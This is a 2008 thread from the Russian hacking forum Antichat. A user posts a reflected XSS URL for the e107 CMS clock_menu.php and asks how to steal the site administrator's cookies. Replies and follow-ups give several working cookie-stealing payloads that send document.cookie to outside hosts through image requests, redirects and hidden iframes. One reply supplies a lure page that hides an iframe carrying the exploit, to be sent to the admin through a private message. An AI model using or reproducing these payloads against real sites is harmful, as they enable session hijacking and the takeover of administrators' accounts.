Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Куки админа (https://forum.antichat.xyz/showthread.php?t=93468)

WiSp 25.11.2008 19:05
Куки админа
 
Тако сабж...

Есть уязвимость в движке е107
Код:
clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Собсна проблема в том, что не знаю как сделать так чтобы, это все подсунуть админу, и чтобы его куки выскочили не в окне, а сохранились где-то на моем хосте в лог файлах...в этом роде...

З.Ы если есть другие варианты подскажите пожалуйста... а то уже 2-ую неделю мучаюсь

Заранее спасибо

WiSp 25.11.2008 22:35
Эм....тут чуток разобрался...запустил снифер....Но снифер только на форум..на сайт никак...везде права на все урезаны...как мне через активную xSS можно сделать...Люди, помогите пожалуйста.

chekist 26.11.2008 12:09
сделай страничку на каком нибудь фрихосте, на странице сделай нивидимый фрейм на хсс, админу в личку отправь месачь с сылкой на эту страницу

WiSp 26.11.2008 19:12
Собствеено делаю....

Вот
Цитата:
<script>img = new Image(); img.src = "http://na-s.ru/images/image_1.gif?"+document.cookie; // код кражи куки // редирект через 3 сек. var URL = "http://image.ru/image.jpg" // адрес картинки var speed = 3000 function reload() { document.location = URL } setTimeout("reload()", speed); </script>
Но не работает( как ни старался... проверял на своем хосте...

WiSp 26.11.2008 20:21
А используя

Код:
document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');
используя ява скрипт он должен открывать в принципе фрейм и сохранять куки вот здесь http://xss.host.ru/cookies

Но после всех проделанных действий ни куки ничего...

З.Ы. хост поддерживает и выполнение ява скриптов и пхп

furang 26.11.2008 21:19
у кукисов наверно ограниченная зона действия.
по дефолту у всех / стоит, но можно выбрать и другую диру

chekist 27.11.2008 13:02
попробуй так
Код HTML:
<html>
тут какой нибуть флуд для админа

<iframe width=21 height=11 style="position: absolute; visibility: hidden;" src="http://жертва/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22);//--><script>document.location='http://тутснифер/?'+document.cookie+;</script>"></iframe>
</html>


Время: 07:45